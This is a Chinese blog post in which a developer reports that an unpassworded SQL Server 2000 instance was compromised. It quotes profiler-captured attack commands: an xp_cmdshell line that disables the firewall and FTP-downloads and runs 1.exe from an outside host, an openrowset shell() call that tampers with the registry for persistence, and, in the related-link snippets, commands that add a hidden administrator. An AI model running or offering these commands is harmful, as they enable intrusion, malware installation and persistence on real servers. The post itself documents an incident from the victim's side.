SQLServer遭遇入侵

最新推荐文章于 2023-12-25 15:00:18 发布
最新推荐文章于 2023-12-25 15:00:18 发布
阅读量481 收藏
点赞数
分类专栏: 数据库 文章标签: C++ C# C XP ITeye
本来正在使用Eclipse的断点调试结合事件探查器观察一些SQL语句的执行,
突然发现很奇怪的现象,在没有执行任何语句的时候,事件探查器不断打印出SQLServer服务器的执行记录。

粗看一下,发现这样的语句: 

select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c attrib -s -h wbem\we.exe&del wbem\we.exe&del X.EXE&reg delete HKEY_CLASSES_ROOT\WScript.Shell /f&reg delete HKEY_CLASSES_ROOT\WScript.Shell.1 /f&reg delete HKEY_CLASSES_ROOT\Wifayy /f&reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution options\ftp.exe  /v Debugger /t REG_SZ /d ctfmon.exe /f")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword


而且还正在不停的执行,由于是今天刚重新装好的电脑以及SQL2000,没有设置sa密码。没有安装杀毒软件,
赶快把服务器停掉、把网络断掉。

首先检查一下,任务管理器多出来的进程:

[img]http://dl.iteye.com/upload/attachment/474028/8839b892-1359-346e-a084-3565750afd09.jpg[/img]

在C盘上搜索了一下最新的文件,大概多出了:
c:\cmd.exe
c:\windows\system32\cmd 没有扩展名,打开是一个文本文件,内容是: 
open 2yxy.8800.org
123
123
binary 
get 1.exe C:\cmd.exe
bye

c:\windows\system32\1.exe 图标是JPG文件的图标,属性写的是QQ2010,毫无疑问是病毒伪装的
c:\windows\system32\c.exe
还有好几个文件。太可恨了!!

使用AutoRuns查了一下,多出来的自动启动的服务:
[img]http://dl.iteye.com/upload/attachment/474035/e36f5837-c623-39fa-be1a-c704cc28d560.jpg[/img]

现在把事件探查器的记录结果记在下面,有时间再分析吧: 


exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
exec xp_cmdshell 'cmd.exe /c net stop sharedaccess&@echo open 2yxy.8800.org> cmd&@echo 123>> cmd&@echo 123>> cmd&@echo binary >> cmd&@echo get 1.exe C:\cmd.exe>> cmd&@echo bye >> cmd&ftp -s:cmd &C:\cmd.exe&del cmd /q /f&ping -n 3 127.0.0.1>nul&del C:\cmd.exe /f' 
SELECT N'Testing Connection...'
EXECUTE msdb.dbo.sp_sqlagent_get_perf_counters
-- sp_sqlagent_get_perf_counters
CREATE TABLE #temp
  (
  performance_condition NVARCHAR(1024) COLLATE database_default NOT NULL
  )
-- sp_sqlagent_get_perf_counters
INSERT INTO #temp VALUES (N'dummy')


太多了,不再记录了,跟踪记录保存下来了。

对了对方的ApplicationName是ISQL-32

真是火大了,TNND!!!
iteye_9831
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
在公共网络被isql病毒远程攻击——电脑上启用SQL服务器和Guest用户的同学们注意
xzhenhuan的专栏
05-09 1155
<br />交待一下背景:最近在做毕业设计,笔记本上开启了Guest用户和SQLserver,这两个嫌疑最大。<br />本次被入侵的原因可能是以下之一:<br />1、             SQLserver进程可以被侵入(上网搜:isql 病毒)。<br />2、    Guest用户没有加密码,也许被对方远程扫描到了,通过telnet登录了我的电脑(这个原因的可能性不大)。<br /> <br />被侵入的过程如下:<br />首先,360提醒我,有一个进程(其实这个是伪装的攻击)修改了注册表,增
sqlserver离线安装包
11-01
sqlserver离线安装包
修复被入侵的数据库记录(SQL)
09-19
修复被入侵的数据库记录(SQL),实现对对整个数据库替换指定内容。
如何判断SQLServer服务器被入侵
dingdingshinie1008的博客
08-13 367
介绍两个查看SQLServer服务器是否被入侵的方法: 1、入侵入侵后一般会开服务器的3389,建立隐藏用户,然后登录。我们只要到C:\Documents and Settings这个目录下看看是否有可以的用户名就可以了,不管是不是隐藏的用户,都会在这里显示出来。 2、有些入侵者喜欢留一个有高权限的sqlserver数据库用户,当作后门,我们可以打开登陆sqlserver的查询分析器,...
SQL入侵教程
05-12
SQL入侵,注入教程,SQL安全,优化SQL
SQL Injection技巧的演练
萝卜青菜
11-24 1065
摘要:下文是为了帮助那些希望能掌握这个漏洞的运用、并想得知如何保护自己免受这种漏洞攻击的人了解该漏洞的本质而写的。详细资料:1.0绪论当一台机器只开放了80端口(这里指的是提供HTTP服务)时,可能你的大多数漏洞扫描器都不能给到你很多有价值的信息(漏洞信息),倘若这台机器的管理员是经常为他的服务器打PATCH的话,我们只好把攻击的矛头指向WEB服务攻击了。SQL注入攻击是WEB攻击类型中的一种,这
防止对SQL Server的蛮力攻击
寒冰屋的专栏
07-19 837
目录 介绍 背景 使用代码 备注 介绍 有时,您需要将SQL服务器暴露给internet,从而允许在不使用VPN的情况下从任何IP地址连接,从而降低SQL服务器被不需要的客户机攻击的可能性。通过检测失败的登录并阻止其IP地址一段时间,您很有可能让它们继续攻击另一台服务器。此代码创建防火墙规则,以阻止攻击者几次尝试。 背景 有一种解决方案是为每个应该被阻止的IP地址创建了一个防火墙规则,当阻止列表中有成百上千个地址时,这使情况变得一团糟。我的解决方案创建IP地址块(可配置),并将防火墙规则列表
通过MSSQL 2000 入侵服务器主机器
生活要快乐 - 魏言
03-01 617
首先确保得到数据库超级管理员权限然后执行如下SQL命令:1、exec master.dbo.xp_cmdshell net user hacker hacker /add 2、exec master.dbo.xp_cmdshell net localgroup administrators hacker /add  解释:1.通过调用cmdshell   也就是cmd
Sql Server 2014 安装包
09-02
SQL Server 2014是微软推出的一款关系型数据库管理系统,它在企业级数据管理和分析领域扮演着重要的角色。此安装包包含两个主要组件:SQL Management Studio和SQL Server Express。 1. **SQL Management Studio ...
sql server2019安装包
最新发布
01-19
SQL Server 2019是Microsoft推出的一款关系型数据库管理系统,是SQL Server系列中的一个重要版本。它提供了强大的数据存储、处理和分析能力,广泛应用于企业级数据库应用开发和数据分析。在本安装包中,主要包含的是...
SqlServer1433端口入侵检测工具
12-17
这是网上目前流行的针对mssql的入侵工具,首先进行半开式扫描,扫出开放1433端口的主机之后,再用xscan进行弱口令猜解,最后恢复管理员删除的存储过程,上传木马 进而达到控制主机的目的 mssql使用者可以用来检测自己的数据库是否能被轻易入侵
SQL事件查看器日志 攻击日志
03-19
请大家分析一下,我觉得好些SQL不是我程序执行的 怎么办
SQLServer2005-BC
04-15
SQLServer2005_BC
你的SQLServer服务器安全吗?
maxiaoqiang1的专栏
03-18 688
<br />本文只做技术交流,请勿用于非法用途,出现任何问题,本人概不负责。<br /><br />先说一件事吧,去年同事的一台笔记本电脑装的xp系统,三番几次被人增加系统用户,用户名都internetusers,问问同事的笔记本电脑最近都做什么了,答复是一家软件公司给安装了一套数据库软件,这下基本明白怎么回事了,因为同事的登陆界面已经不显示administrator这个用户名了,按了2次重启键,用administrator用户登录到系统,看到了sqlserver的运行图标,打开查询分析器,用sa登录,密码
黑客SQL服务器入侵实战演习
yakoo5的专栏
02-26 1146
黑客SQL服务器入侵实战演习 1.0绪论
入侵mssql2000
天元喜羊羊的博客
04-19 1473
环境:XP + SP3 + MS SQL SERVER 2000 + SP4 数据库配置如下: 配置成SQL Server验证,sa密码是root123。 BT4里用metasploit入侵过程如下: 上面第一次登陆失败,是因为mssql2000的登陆模式
避免SQL SERVER频繁遭受攻击的方法
互联网-从零开始
10-10 2786
之前SQL Server频繁遭受攻击,后来索性就把远程访问给关闭了,但是这样就造成有些只能使用TCP/IP访问SQL Server的程序无法使用数据库,比如使用JDBC连接SQL Server的方式就无法使用了。所以最好的办法就是修改SQL Server的默认端口号为其他号。自从修改成其他号之后,用netstat /ano查看端口的连接情况,就再也看不到乱七八糟的连接了。
SQL入侵注入的完全总结详解(网上搜集的,)
Intgrp的博客
09-01 771
一、方法总结:   1.判断是否有注入  and 1=1  and 1=2  2.初步判断是否是mssql  and user>0  3.判断数据库系统  and (select count(*) from sysobjects)>0   mssql  and (select count(*) from msysobjects)>0  access  4.注入参数是字符  an
sqlserver发现在被暴破攻击的处理
jxyz3333的博客
12-25 276
但是过了一段时间发现还是有异常登录,对方会不断地切换ip试图登录,我的端口和账户都不好改,所以换一个思路;执行,获得ip列表,然后将查询结果导入到火绒的ip黑名单里直接拒绝访问;日常在用的OA数据库发现被爆破中,查看日志有大量的登录失败日志;然后又过了几天,发现没有登录失败的日志了,问题应该暂时解决了;建了个存储过程,筛选出所有的攻击ip;
SQL Server 2008 必备SQL教程
"Essential SQL on SQL Server 2008" 是一本面向SQL Server 2008数据库管理者的实用指南,由SikhaBagui和RichardEarp合作编写,旨在提供核心的SQL语言知识以及针对此特定版本的Microsoft SQL Server的深入理解。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值